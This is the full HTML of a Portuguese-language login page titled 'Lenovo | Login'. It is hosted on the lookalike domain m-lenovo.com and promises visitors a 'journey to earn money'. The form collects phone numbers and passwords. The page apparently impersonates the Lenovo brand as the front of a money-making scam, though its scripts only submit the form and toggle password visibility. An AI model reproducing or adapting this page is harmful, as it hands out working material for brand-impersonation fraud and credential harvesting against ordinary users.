<!DOCTYPE html>
<html lang="pt-BR"
      style="--status-bar-height: 0px; --top-window-height: 0px; --window-left: 0px; --window-right: 0px; --window-margin: 0px; --window-top: calc(var(--top-window-height) + 0px); --window-bottom: 0px;">
<head>
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <title>Lenovo | Login</title>
    <meta name="viewport"
          content="width=device-width, user-scalable=no, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0, viewport-fit=cover">

    <meta name="title" Content="Lenovo">


    <meta name="description" content="Descubra os notebooks, PCs, acessórios e soluções inovadoras da Lenovo. Tecnologia de ponta para produtividade, entretenimento e negócios.">
    <meta name="keywords" content="Lenovo,laptop,notebook,pro">

    <link rel="shortcut icon" href="https://m-lenovo.com/public/static/logo-shared.jpg" type="image/x-icon">

    
    <link rel="apple-touch-icon" href="https://m-lenovo.com/public/static/logo.png">
    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="apple-mobile-web-app-status-bar-style" content="black">
    <meta name="apple-mobile-web-app-title" content="Lenovo">

    
    <meta itemprop="name" content="Lenovo">
    <meta itemprop="description" content="Descubra os notebooks, PCs, acessórios e soluções inovadoras da Lenovo. Tecnologia de ponta para produtividade, entretenimento e negócios.">
    <meta itemprop="image" content="https://m-lenovo.com/public/static/logo-shared.jpg">

    
    <meta property="og:type" content="website">
    <meta property="og:title" content="Lenovo">
    <meta property="og:description" content="Descubra os notebooks, PCs, acessórios e soluções inovadoras da Lenovo. Tecnologia de ponta para produtividade, entretenimento e negócios.">
    <meta property="og:image" content="https://m-lenovo.com/public/static/logo-shared.jpg"/>
    <meta property="og:image:type" content="jpg"/>
    <meta property="og:image:width" content="1200" />
    <meta property="og:image:height" content="1200" />
    <meta property="og:url" content="https://m-lenovo.com/login">
    

    <meta name="twitter:card" content="summary_large_image">

    <link rel="stylesheet" href="https://m-lenovo.com/public/static/index.2da1efab.css">
    <link rel="stylesheet" href="https://m-lenovo.com/public/static/register.css">
    <style>
.register[data-v-1f33345e] {
    min-height: 100vh;
    position: relative;
    z-index: 1;
    padding: 25px 0 0;
    background: url(https://m-lenovo.com/public/static/img/bg@2x.fb3f2d29.png) no-repeat;
    background-size: 100% 100%
}
</style>

  <style type="text/css">
                        body.pages-login-login uni-page-body {
                            background-color: #fff;
                            font-family: PingFang SC
                        }

body.pages-login-login {
    background-color: #fff
}

.login[data-v-5df49fe2] {
    min-height: 100vh;
    position: relative;
    z-index: 1;
    background: url(https://m-lenovo.com/public/bg.png) no-repeat;
    background-size: 100% 100%;
    overflow-x: hidden;
    font-color: #fff
}

.login .sign-up[data-v-5df49fe2] {
    display: -webkit-box;
    display: -ms-flexbox;
    display: flex;
    -webkit-box-align: center;
    -ms-flex-align: center;
    align-items: center;
    -webkit-box-pack: justify;
    -ms-flex-pack: justify;
    justify-content: space-between
}

.login .sign-up .isagree[data-v-5df49fe2] {
    border-color: #e55e50;
    background-color: #e55e50
}

.login .header[data-v-5df49fe2] {
    padding: 0 13px;
    margin-bottom: 15px
}

.login .header .leftimg[data-v-5df49fe2] {
    width: 180px;
    height: auto
}

.login .header .rightimg[data-v-5df49fe2] {
    width: 24px;
    height: auto
}

.login .imgonline[data-v-5df49fe2] {
    width: 100%;
    height: auto
}

.login .van-overlay[data-v-5df49fe2] {
    z-index: 9999
}

.login.van-cell-group .van-cell[data-v-5df49fe2] {
    background: none;
    color: #333
}

.login.van-cell-group[data-v-5df49fe2]:after {
    border: none
}

.login .form-box[data-v-5df49fe2] {
    padding: 33px;
    background: #fff;
    border-radius: 36px 36px 0px 0px
}

.login .login-form[data-v-5df49fe2] {
    margin-top: 66px;
    background-color: #fff;
    position: fixed;
    bottom: 0
}

.login .login-form .login-title-container[data-v-5df49fe2] {
    text-align: left;
    margin-bottom: 23px
}

.login .login-form .login-title-container h3[data-v-5df49fe2] {
    margin: 0;
    font-size: 26px;
    position: relative;
    z-index: 1;
    -webkit-transform: skew(-10deg);
    transform: skew(-10deg)
}

.login .login-form .login-title-container p[data-v-5df49fe2] {
    margin-top: 5px;
    font-size: 16px;
    -webkit-transform: skew(-10deg);
    transform: skew(-10deg);
    font-weight: 500
}

.login .login-form .phonei[data-v-5df49fe2] {
    text-align: left;
    font-weight: 600;
    font-size: 15px;
    margin-bottom: 8px
}

.login .login-form .xy[data-v-5df49fe2] {
    display: block;
    text-align: right;
    margin-top: 10
}

.login .login-form .xy .xy-link[data-v-5df49fe2] {
    color: #666
}

.login .login-form .input-group[data-v-5df49fe2] {
    width: 100%;
    border-radius: 6px;
    overflow: hidden;
    padding: 20px 0 0 0;
    -webkit-box-sizing: border-box;
    box-sizing: border-box;
    position: relative;
    margin-top: 15px
}

.login .login-form .input-group[data-v-5481d0af][data-v-5df49fe2]:nth-of-type(2) {
    position: relative
}

.login .login-form .input-group:nth-of-type(2) .yzm-code[data-v-5df49fe2] {
    position: absolute;
    bottom: 10px;
    width: 40%;
    height: 55px;
    right: 0;
    background: none;
    font-size: 14px;
    color: #2c3e50
}

.login .sign-up a[data-v-5df49fe2] {
    color: #34495e
}

.login .registerBtn[data-v-5df49fe2] {
    width: 50%;
    margin: 50px auto 10px;
    border: none;
    border-radius: 50px;
    background: #e55e50
}

.login .registerBtn .van-button__text[data-v-5df49fe2] {
    color: #fff;
    font-weight: 700;
    font-size: 18px;
    -webkit-transform: skew(-10deg);
    transform: skew(-10deg)
}

.login .registerBtnBot[data-v-5df49fe2] {
    width: 50%;
    margin: 10px auto;
    border: 1px solid #e55e50;
    border-radius: 50px;
    background: #fff
}

.login .registerBtnBot .van-button__text[data-v-5df49fe2] {
    color: #001f20;
    font-weight: 700;
    font-size: 18px;
    -webkit-transform: skew(-10deg);
    transform: skew(-10deg)
}</style>
</head>
<body class="uni-body pages-login-register">
<uni-app class="uni-app--maxwidth">
    <uni-page data-page="pages/login/login">
        <uni-page-wrapper>
            <uni-page-body>
                <uni-view data-v-5df49fe2="" class="login">
                    <uni-view data-v-5df49fe2="" class="van-overlay"
                              style="background: rgba(0, 0, 0, 0);display: none">
                        <uni-view data-v-5df49fe2="" class="loading-box-h">
                            <uni-view data-v-5df49fe2="" class="van-loading van-loading--spinner van-loading--vertical">
                                <span data-v-5df49fe2="" class="van-loading__spinner van-loading__spinner--spinner"
                                      style="width: 30px; height: 30px;"><i data-v-5df49fe2=""></i><i
                                        data-v-5df49fe2=""></i><i data-v-5df49fe2=""></i><i data-v-5df49fe2=""></i><i
                                        data-v-5df49fe2=""></i><i data-v-5df49fe2=""></i><i data-v-5df49fe2=""></i><i
                                        data-v-5df49fe2=""></i><i data-v-5df49fe2=""></i><i data-v-5df49fe2=""></i><i
                                        data-v-5df49fe2=""></i><i data-v-5df49fe2=""></i></span><span data-v-5df49fe2=""
                                                                                                      class="van-loading__text">Carregando...</span>
                            </uni-view>
                        </uni-view>
                    </uni-view>

                    <uni-view data-v-5df49fe2="" style="margin-top: 93px;">
                        <img data-v-5df49fe2="" src="https://m-lenovo.com/public/static/logo-white.png"
                             alt="" style="width: 370px;  background-attachment: fixed; background-size: cover;">
                    </uni-view>
                    <div data-v-5df49fe2="" class="login-form form-box">
                        <form action="login.html" method="post">
                            <input type="hidden" name="_token" value="kuPcLqKyHaA4uXZzdTlea7HXtpcdcgk5G3JGHHfU">                            <div data-v-5df49fe2="" class="login-title-container"><h3 data-v-5df49fe2="">LOGIN</h3>
                                <p data-v-5df49fe2="">Bem-vindo de volta, faça login na sua conta e comece a jornada
                                    para ganhar dinheiro</p></div>
                            <p data-v-5df49fe2="" class="phonei">Phone</p>
                            <div data-v-5df49fe2="" class="groupbox van-cell-group van-hairline--bottom">
                                <div data-v-5df49fe2=""
                                     class="input-box van-cell van-cell--large van-field van-field--label-left">
                                    <div data-v-5df49fe2=""
                                         class="van-cell__value van-cell__value--alone van-field__value">
                                        <div data-v-5df49fe2="" class="van-field__body"><img data-v-5df49fe2=""
                                                                                             src="https://m-lenovo.com/public/static/phone.png"
                                                                                             style="width: 23px; height: 29px; margin-right: 15px;">
                                            <uni-input data-v-5df49fe2="" class="van-field__control">
                                                <div class="uni-input-wrapper">
                                                    <input maxlength="140" step="" autocomplete="off"
                                                           placeholder="Por favor insira seu telefone"
                                                           name="phone"
                                                           inputmode="decimal" type="number" class="uni-input-input">
                                                </div>
                                            </uni-input>
                                        </div>
                                    </div>
                                </div>
                            </div>
                            <p data-v-5df49fe2="" class="phonei">Senha</p>
                            <div data-v-5df49fe2="" class="groupbox van-cell-group van-hairline--bottom">
                                <div data-v-5df49fe2="" class="input-box van-cell van-cell--large van-field">
                                    <div data-v-5df49fe2=""
                                         class="van-cell__value van-cell__value--alone van-field__value">
                                        <div data-v-5df49fe2="" class="van-field__body"><img data-v-5df49fe2=""
                                                                                             src="https://m-lenovo.com/public/static/lock.png"
                                                                                             style="width: 23px; height: 23px; margin-right: 15px;"><input
                                                data-v-5df49fe2="" placeholder="Por favor insira sua senha"
                                                type="password"
                                                name="password"
                                                class="van-field__control">
                                            <div data-v-5df49fe2="" class="van-field__right-icon" onclick="eye()"><i
                                                    data-v-5df49fe2=""
                                                    class="van-icon  van-icon-closed-eye"
                                                    style="color: rgb(229, 94, 80); width: 13px; height: 27px;"></i>
                                            </div>
                                        </div>
                                    </div>
                                </div>
                            </div>
                            <div data-v-5df49fe2="" class="sign-up">
                                <div data-v-5df49fe2="" class="checkbox-container">
                                    <div data-v-5df49fe2="" role="checkbox" tabindex="0" class="van-checkbox">
                                        <div data-v-5df49fe2="" class="van-checkbox__icon van-checkbox__icon--square ">
                                            <i
                                                data-v-5df49fe2="" class="van-icon van-icon-success"></i></div>
                                        <span data-v-5df49fe2="" class="van-checkbox__label">Lembrar a Senha</span>
                                    </div>
                                </div>
                            </div>
                            <uni-button data-v-5df49fe2=""
                                        onclick="login()"
                                        class="registerBtn van-button van-button--primary van-button--normal van-button--block">
                                <div data-v-5df49fe2="" class="van-button__content"><span data-v-5df49fe2=""
                                                                                          class="van-button__text">LOGIN</span>
                                </div>
                            </uni-button>
                            <uni-button data-v-5df49fe2=""
                                        onclick="window.location.href='registrar.html'"
                                        class="registerBtnBot van-button van-button--primary van-button--normal van-button--block">
                                <div data-v-5df49fe2="" class="van-button__content"><span data-v-5df49fe2=""
                                                                                          class="van-button__text">Registro</span>
                                </div>
                            </uni-button>
                        </form>
                    </div>
                </uni-view>
            </uni-page-body>
        </uni-page-wrapper>
    </uni-page>
</uni-app>

<script>
    function login() {
        document.querySelector('.van-overlay').style.display = 'block';
        document.querySelector('form').submit();
    }
</script>
<script>
    function eye() {
        var pass = document.querySelector('input[name="password"]');
        if (pass.type == 'password') {
            pass.type = 'text'
        } else {
            pass.type = 'password'
        }
    }
</script>
</body>
</html>
